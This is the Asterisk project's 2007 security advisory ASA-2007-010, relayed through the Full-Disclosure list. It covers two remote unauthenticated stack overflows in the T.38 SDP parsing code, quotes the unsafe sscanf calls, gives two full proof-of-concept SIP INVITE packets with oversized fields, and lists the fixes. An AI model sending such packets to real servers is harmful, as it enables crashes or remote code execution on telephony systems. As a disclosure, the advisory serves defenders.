Asterisk Project Security Advisory - ASA-2007-010
+------------------------------------------------------------------------+
| Product | Asterisk |
|--------------------+---------------------------------------------------|
| Summary | Two stack buffer overflows in SIP channel's T.38 |
| | SDP parsing code |
|--------------------+---------------------------------------------------|
| Nature of Advisory | Exploitable Stack Buffer Overflow |
|--------------------+---------------------------------------------------|
| Susceptibility | Remote Unauthenticated Sessions |
|--------------------+---------------------------------------------------|
| Severity | Moderate |
|--------------------+---------------------------------------------------|
| Exploits Known | No |
|--------------------+---------------------------------------------------|
| Reported On | March 22, 2007 |
|--------------------+---------------------------------------------------|
| Reported By | Barrie Dempster, NGS Software, |
| | <barrie@ngssoftware.com> |
|--------------------+---------------------------------------------------|
| Posted On | April 24, 2007 |
|--------------------+---------------------------------------------------|
| Last Updated On | April 24, 2007 |
|--------------------+---------------------------------------------------|
| Advisory Contact | kpfleming@digium.com |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------------------+
|Description|Two closely related stack based buffer overflows exist in the
SIP/SDP |
| |handler of Asterisk, the vulnerabilities are very similar but
exist as |
| |two separate unsafe function calls. The T38FaxRateManagement and
|
| |T38FaxUdpEC SDP parameters can be exploited remotely leading to
|
| |arbitrary code execution without authentication. In order for
these |
| |overflows to occur, t38 fax over SIP must be enabled in
sip.conf. |
| |Examples of SIP INVITE packets are shown below, however these
|
| |vulnerabilities can be triggered with a number of different SIP
messages|
| |affecting calls received by Asterisk, or in response to calls
made by |
| |Asterisk.
|
| |
|
| |Remote Unauthenticated stack overflow in Asterisk SIP/SDP
|
| |T38FaxRateManagement parameter
|
| |
|
| |A remote unauthenticated stack overflow exists in the SIP/SDP
handler of|
| |Asterisk. By sending a SIP packet with SDP data which includes
an overly|
| |long T38 parameter it is possible to overflow a stack based
buffer and |
| |execute arbitrary code.
|
| |
|
| |The process_sdp function of chan_sip.c in Asterisk contains the
|
| |following vulnerable call to sscanf.
|
| |
|
| |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {
|
| |
|
| |found = 1;
|
| |
|
| |if (option_debug > 2)
|
| |
|
| |ast_log(LOG_DEBUG, "RateMangement: %s\n", s);
|
| |
|
| |if (!strcasecmp(s, "localTCF"))
|
| |
|
| |peert38capability |=
|
| |
|
| |T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
|
| |
|
| |else if (!strcasecmp(s, "transferredTCF"))
|
| |
|
| |peert38capability |=
|
| |
|
| |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;
|
| |
|
| |This attempts to read the "T38FaxRateManagement:" option from
the SDP |
| |within a SIP packet and copy the succeeding string into "s".
There are |
| |no checks on the length of this string and we can therefore
write past |
| |the boundaries of the "s" variable overwriting adjacent memory
on the |
| |stack. "s" is defined earlier in this function as being a
character |
| |array of only 256 bytes. The following example packet
demonstrates an |
| |overflow of this parameter:
|
| |
|
| |INVITE sip:200@127.0.0.1 SIP/2.0
|
| |
|
| |Date: Wed, 21 Mar 2007 4:20:09 GMT
|
| |
|
| |CSeq: 1 INVITE
|
| |
|
| |Via: SIP/2.0/UDP
|
| |
|
|
|10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
| |
|
| |User-Agent: NGS/2.0
|
| |
|
| |From: "Barrie Dempster"
|
| |
|
|
|<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
| |
|
| |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
|
| |
|
| |To: <sip:200@localhost>
|
| |
|
| |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp>
|
| |
|
| |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
|
| |
|
| |Content-Type: application/sdp
|
| |
|
| |Content-Length: 796
|
| |
|
| |Max-Forwards: 70
|
| |
|
| |v=0
|
| |
|
| |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
|
| |
|
| |s=-
|
| |
|
| |c=IN IP4 127.0.0.1
|
| |
|
| |t=0 0
|
| |
|
| |m=image 5004 UDPTL t38
|
| |
|
| |a=T38FaxVersion:0
|
| |
|
| |a=T38MaxBitRate:14400
|
| |
|
| |a=T38FaxMaxBuffer:1024
|
| |
|
| |a=T38FaxMaxDatagram:238
|
| |
|
|
|a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAA
|
| |
|
| |a=T38FaxUdpEC:t38UDPRedundancy
|
| |
|
| |-------------------------------------------------
|
| |
|
| |Remote Unauthenticated stack overflow in Asterisk SIP/SDP
T38FaxUdpEC |
| |parameter
|
| |
|
| |A remote unauthenticated stack overflow exists in the SIP/SDP
handler of|
| |Asterisk. By sending a SIP packet with SDP data which includes
an overly|
| |long T38FaxUdpEC parameter it is possible to overflow a stack
based |
| |buffer and execute arbitrary code.
|
| |
|
| |The process_sdp function of chan_sip.c in Asterisk contains the
|
| |following vulnerable call to sscanf.
|
| |
|
| |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {
|
| |
|
| |found = 1;
|
| |
|
| |if (option_debug > 2)
|
| |
|
| |ast_log(LOG_DEBUG, "UDP EC: %s\n", s);
|
| |
|
| |if (!strcasecmp(s, "t38UDPRedundancy")) {
|
| |
|
| |peert38capability |=
|
| |
|
| |T38FAX_UDP_EC_REDUNDANCY;
|
| |
|
| |ast_udptl_set_error_correction_scheme(p->udptl,
|
| |
|
| |UDPTL_ERROR_CORRECTION_REDUNDANCY);
|
| |
|
| |This attempts to read the "T38FaxUdpEC:" option from the SDP
within a |
| |SIP packet and copy the succeeding string into "s". There are no
checks |
| |on the length of this string and we can therefore write past the
|
| |boundaries of the "s" variable overwriting adjacent memory on
the stack.|
| |"s" is defined earlier in this function as being a character
array of |
| |only 256 bytes. The following example packet demonstrates an
overflow of|
| |this parameter:
|
| |
|
| |INVITE sip:200@127.0.0.1 SIP/2.0
|
| |
|
| |Date: Wed, 21 Mar 2007 4:20:09 GMT
|
| |
|
| |CSeq: 1 INVITE
|
| |
|
| |Via: SIP/2.0/UDP
|
| |
|
|
|10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
| |
|
| |User-Agent: NGS/2.0
|
| |
|
| |From: "Barrie Dempster"
|
| |
|
|
|<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
| |
|
| |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
|
| |
|
| |To: <sip:200@localhost>
|
| |
|
| |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp>
|
| |
|
| |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
|
| |
|
| |Content-Type: application/sdp
|
| |
|
| |Content-Length: 796
|
| |
|
| |Max-Forwards: 70
|
| |
|
| |v=0
|
| |
|
| |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
|
| |
|
| |s=-
|
| |
|
| |c=IN IP4 127.0.0.1
|
| |
|
| |t=0 0
|
| |
|
| |m=image 5004 UDPTL t38
|
| |
|
| |a=T38FaxVersion:0
|
| |
|
| |a=T38MaxBitRate:14400
|
| |
|
| |a=T38FaxMaxBuffer:1024
|
| |
|
| |a=T38FaxMaxDatagram:238
|
| |
|
|
|a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
| |
|
| |AAAAAAAAA
|
+------------------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | T.38 support in the affected versions of Asterisk is not |
| | enabled by default, therefore the severity of this issue |
| | is 'moderate'. |
| | |
| | Users who are using the default configuration with |
| | 't38_udptl' set to 'no' or an equivalent value are not |
| | susceptible to this vulnerability. Users who have set |
| | this configuration item to 'yes' or an equivalent value |
| | but are not actually using T.38 support can set it to |
| | 'no' to secure their systems against this vulnerability. |
| | |
| | All other users are urged to upgrade to the appropriate |
| | version of their Asterisk product listed in the |
| | 'Corrected In' section below. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.0.x | not affected; does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.2.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.4.x | all releases prior to |
| | | 1.4.3 |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | A.x.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | B.x.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| AsteriskNOW | pre-release | all releases prior to and |
| | | including Beta 5 |
|------------------------------+-------------+---------------------------|
| Asterisk Appliance Developer | 0.x.x | all releases prior to |
| Kit | | 0.4.0 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|--------------------+---------------------------------------------------|
| Asterisk Open | 1.4.3, available from |
| Source | ftp://ftp.digium.com/pub/telephony/asterisk |
|--------------------+---------------------------------------------------|
| AsteriskNOW | Beta 6, when available from |
| | http://www.asterisknow.org, Beta 5 users can use |
| | use 'System Update' in the appliance control |
| | panel to update their version of AsteriskNOW |
|--------------------+---------------------------------------------------|
| Asterisk Appliance | 0.4.0, available from |
| Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Links | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security. |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://www.asterisk.org/files/ASA-2007-010.pdf. |
+------------------------------------------------------------------------+
Asterisk Project Security Advisory - ASA-2007-010
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
